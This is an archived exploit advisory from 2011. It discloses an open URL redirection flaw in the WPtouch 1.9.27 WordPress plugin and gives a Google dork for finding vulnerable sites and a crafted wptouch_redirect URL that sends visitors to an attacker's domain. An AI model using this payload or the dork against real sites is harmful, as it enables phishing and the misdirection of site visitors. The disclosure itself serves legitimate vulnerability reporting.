WordPress WPTouch 1.9.27 URL Redirection

2011-06-20T00:00:00
ID PACKETSTORM:102451
Type packetstorm
Reporter MaKyOtOx
Modified 2011-06-20T00:00:00

Description

                                        
                                            `# Exploit Title: 0-Day WPtouch WordPress Plugin 1.9.27 URL redirection  
# Google Dork: intext:"Powered by Wordpress + WPtouch" (with iphone/android User-Agent)  
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoins)  
# Date: 20/06/2011  
# Software Link: http://wordpress.org/extend/plugins/wptouch/  
# Version: 1.9.27 (not tested on previous versions)  
# Tested on: WhatEver OS  
# CVE : 0-Day  
  
http://site.com/?wptouch_view=normal&wptouch_redirect=.attacker-site.com  
  
# It would redirect to : http://site.com.attacker-site.com :)  
`